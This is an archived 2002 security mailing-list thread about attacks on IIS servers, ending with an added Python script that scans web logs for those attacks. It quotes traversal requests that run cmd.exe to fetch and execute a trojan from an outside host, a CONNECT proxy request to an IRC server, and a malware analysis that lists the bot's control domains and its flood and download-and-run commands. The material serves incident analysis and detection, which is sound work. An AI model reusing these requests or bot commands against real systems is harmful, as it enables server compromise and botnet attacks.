From: David LeBlanc (dleblanc_at_microsoft.com)
Date: Thu Sep 26 2002 - 15:24:09 CDT
If you want something that automatically installs only patches you
approve, take a look at
http://www.microsoft.com/windows2000/windowsupdate/sus/default.asp
It might help you in your environment.
> -----Original Message-----
> From: zeno [mailto:bugtraq@cgisecurity.net]
> Sent: Tuesday, September 24, 2002 2:08 PM
> To: John Campbell
> Cc: incidents@securityfocus.com
> Subject: Re: new IIS worm? (rcp lsass.exe)
>
>
> >
> > Windows Update from you-know-who actually does what you describe. I'd
> > always been leery of it, but tried it out recently when setting up a
> > W2K test server, and it performed as advertised. It did take several
> > iterations to get everything updated, owing to various dependencies.
>
> When I used Windows Update it downloaded the patches but
> didn't install them. I had to manually go through each one.
> While this isn't a big deal I am looking for something 100
> percent automated with install of the patches. Perhaps I'm
> missing something; I deal mostly with unix.
>
> - zeno
>
>
> >
> > Regards,
> >
> > John Campbell, CISSP, GCWN
> > Information Security Engineer
> > Washington School Information Processing Cooperative
> > (WSIPC)
> > Everett, Washington, USA
> >
> > -----Original Message-----
> > From: zeno [mailto:bugtraq@cgisecurity.net]
> > Sent: Tuesday, September 24, 2002 11:29 AM
> > To: Mark Challender
> > Cc: 'pj@esec.dk'; incidents@securityfocus.com
> > Subject: Re: new IIS worm? (rcp lsass.exe)
> >
> >
> > >
> > > Hardening of IIS with the tools available at Microsoft and using
> > > URLSCAN with the EXE blocking on will stop these attacks.
> > >
> > > Patch, patch, patch, recheck the patches and use URLSCAN!
> >
> > Does anyone know of a gui windows tool that scans your system and
> > provides you with a list of needed patches, and then allows you to
> > select, and have it autodownload and install them? I can't seem to
> > find one (needed mostly for iis).
> >
> > - zeno@cgisecurity.com
> >
> >
> >
> > >
> > > Mark Challender
> > > Network Administrator
> > >
> > > ==================
> > > Veni, Vidi, Geeki
> > > ==================
> > >
> > >
> > > -----Original Message-----
> > > From: pj@esec.dk [mailto:pj@esec.dk]
> > > Sent: Monday, September 23, 2002 3:27 AM
> > > To: incidents@securityfocus.com
> > > Subject: Re: new IIS worm? (rcp lsass.exe)
> > >
> > >
> > >
> > > Christian Mock:
> > >
> > > >Then it seems to go after the web servers, sending the following:
> > >
> > > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..
> > >
> > > >and
> > >
> > > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
> > >
> > > >I've been able to get hold of that lsass.exe binary (9728 bytes), but
> > > >I lack the skills to analyze it; I'll happily mail it to anybody who
> > > >asks.
> > >
> > >
> > > We have seen this attack from 4 different sources since Sept. 16, and
> > > have informed the owner of 64.21.95.7 and downloaded the lsass.exe for
> > > investigation.
> > >
> > > Based on the attack rate this is most likely a scripted or manual
> > > attack, not a worm.
> > >
> > > Judging from the embedded string in this compressed binary it
> > > appears to be an IRC bot based on the kaiten.c code written by
> > > contem@efnet, the author of the Slapper worm:
> > >
> > > Kaiten Win32 API version 2002 by contem@efnet
> > >
> > > The binary contains these domain names, most likely IRC servers used
> > > for controlling the bot:
> > >
> > > telsa5.mine.nu (Korea)
> > > irc.logicfive.net (Taiwan)
> > > moncredo.shacknet.nu (USA)
> > > telsacredo.shacknet.nu (USA)
> > > lar.ath.cx (Taiwan)
> > >
> > > The program accepts commands to make various DOS attacks or download
> > > new versions or executables with http:
> > >
> > > NOTICE %s :PUSH <target> <port> <secs> = A push flooder
> > > NOTICE %s :TCP <target> <port> <secs> = A syn flooder
> > > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> > > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
> > > NOTICE %s :NICK <nick> = Changes the nick of the client
> > > NOTICE %s :DISABLE <pass> = Disables all packeting from this client
> > > NOTICE %s :ENABLE <pass> = Enables all packeting from this client
> > > NOTICE %s :UPDATE <http address> = Downloads a file off the web and updates the client
> > > NOTICE %s :RUN <http address> = Downloads a file off the web and runs it
> > > NOTICE %s :GET <http address> = Downloads a file off the web
> > > NOTICE %s :ADDSERVER <server> = Adds a server to the list
> > > NOTICE %s :DELSERVER <server> = Deletes a server from the list
> > > NOTICE %s :LISTSERVERS = Lists server on the list
> > > NOTICE %s :KILL = Kills the client
> > > NOTICE %s :VERSION = Requests version of client
> > > NOTICE %s :HELP = Displays this
> > >
> > >
> > > There seems also to be a default account and password in the German
> > > language included in this specific version of Kaiten.
> > >
> > > The IIS attack that tries to inject this Trojan usually has another
> > > URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy a
> > > connection to port 6667 (IRC) on chat.vtm.be.
> > >
> > >
> > >
> > > Peter Jelver
> > > ...
> > >
> > > eSec A/S
> > >
> > > http://www.esec.dk
> > > ......................................................................
> > >
> > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
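Added example, not code from any post in this thread: a log-review check for the two request patterns Peter Jelver quoted, the `..%5c` traversal to cmd.exe (including the double-encoded `%255c` spelling) and a `CONNECT` to an IRC port through the web server. The log layout and every log line are constructed for the example; the request strings, the rcp source host and the chat.vtm.be:6667 target are the ones quoted above.

```python
"""Added example: review web-server log lines for the request patterns
quoted in the thread. Not code from the original posts; the log layout
and every line of SAMPLE_LOG are constructed, reusing the request strings
and hostname quoted in the thread."""
import re
from urllib.parse import unquote

# Constructed log lines, one request per line:
#   client-ip  method  request-target  protocol  status
SAMPLE_LOG = """\
10.0.0.5 GET /default.htm HTTP/1.0 200
10.0.0.9 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0 200
10.0.0.9 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0 200
10.0.0.9 CONNECT chat.vtm.be:6667 HTTP/1.0 405
10.0.0.7 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0 404
10.0.0.3 GET /images/logo.gif HTTP/1.0 200
"""

# A traversal that climbs out of a virtual directory and lands on cmd.exe,
# matched against the decoded, slash-normalised, lower-cased target.
TRAVERSAL_TO_CMD = re.compile(r"(?:^|/)\.\./.*cmd\.exe")
IRC_PORTS = {6667}  # the port named in the thread; extend for your environment


def normalize_target(target: str) -> str:
    """Percent-decode until the string stops changing (so %255c, the
    double-encoded backslash, is caught), then fold backslashes to '/'
    and lower-case, so one regex sees every spelling of the same path."""
    prev, cur = None, target
    for _ in range(4):  # bounded: a real request never needs more rounds
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/").lower()


def classify(line: str):
    """Return (label, client_ip, detail) for a suspicious line, else None."""
    parts = line.split()
    if len(parts) < 3:
        return None
    ip, method, target = parts[0], parts[1].upper(), parts[2]
    if method == "CONNECT":
        # CONNECT host:port sent to a web server is a proxy-abuse attempt
        _, _, port = target.rpartition(":")
        if port.isdigit() and int(port) in IRC_PORTS:
            return ("connect-irc-proxy", ip, target)
        return None
    norm = normalize_target(target)
    if TRAVERSAL_TO_CMD.search(norm):
        # Everything after '?' is what cmd.exe /c would run; '+' is a space
        _, _, query = norm.partition("?")
        return ("traversal-cmd", ip, query.replace("+", " "))
    return None


def scan(log_text: str):
    """All suspicious hits in a log, in order, as (label, client_ip, detail)."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for label, ip, detail in scan(SAMPLE_LOG):
        print(f"{label:18} {ip:12} {detail}")
```

Decoding and normalising before matching is the point: the `%5c` form exists precisely to slip past checks that look for `../` in the raw request, and a patched server that returns 404 still logs the attempt, so the check is useful after the fact as well as on a host that URLSCAN (as Mark Challender recommends above) already protects.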